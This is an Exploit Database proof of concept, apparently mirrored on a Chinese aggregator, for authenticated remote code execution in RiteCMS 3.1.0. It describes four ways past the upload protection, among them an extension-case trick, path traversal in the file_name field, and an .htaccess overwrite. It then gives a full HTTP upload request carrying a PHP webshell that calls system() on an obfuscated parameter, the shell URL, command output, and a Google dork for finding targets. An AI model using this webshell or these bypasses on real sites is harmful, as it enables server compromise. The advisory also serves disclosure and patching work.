RiteCMS 3.1.0 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 42 阅读

• 作者： faisalfs10x
  日期： 2022-01-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50616/

• # Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
  # Date: 25/07/2021
  # Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
  # Vendor Homepage: https://ritecms.com/
  # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
  # Version: <= 3.1.0
  # Tested on: Windows 10, Ubuntu 18, XAMPP
  # Google Dork: intext:"Powered by RiteCMS"
  # Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597
  
  
  """
  ################
  # Description#
  ################
  
  # RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default.
  # There are 4 ways of bypassing the current file upload protection to achieve remote code execution.
  
  # Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved
  
  # Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved
  
  # Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved
  By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability.
  Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root
  
  body= Content-Disposition: form-data; name="file_name"
  body= ../webrootExec.php
  
  So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php
  
  # Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved
  
  $ cat .htaccess
  
  <Files *.php>
  deny from all
  </Files>
  
  <Files ~ "webshell\.php$">
  Allow from all
  </Files>
  
  
  ###################################
  # PoC for webshell using Method 2 #
  ###################################
  
  Steps to Reproduce:
  
  1. Login as admin
  2. Go to Files Manager 
  3. Choose a directory to upload .php file either media or files directory. 
  4. Then, click Upload file > Browse.. 
  3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess
  4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory
  
  Request:
  ========
  
  POST /ritecms.v3.1.0/admin.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309
  Content-Length: 1744
  Origin: http://localhost
  DNT: 1
  Connection: close
  Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media
  Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Sec-GPC: 1
  
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="mode"
  
  filemanager
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="file"; filename="webshell.pHp"
  Content-Type: application/octet-stream
  
  <?php system($_GET[base64_decode('Y21k')]);?>
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="directory"
  
  media
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="file_name"
  
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="upload_mode"
  
  1
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="resize_xy"
  
  x
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="resize"
  
  640
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="compression"
  
  80
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="thumbnail_resize_xy"
  
  x
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="thumbnail_resize"
  
  150
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="thumbnail_compression"
  
  70
  -----------------------------410923806710384479662671954309
  Content-Disposition: form-data; name="upload_file_submit"
  
  OK - Upload file
  -----------------------------410923806710384479662671954309--
  
  
  ####################
  # Webshell access: #
  ####################
  
  # Webshell access via:
  PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id
  
  # Output:
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  
  """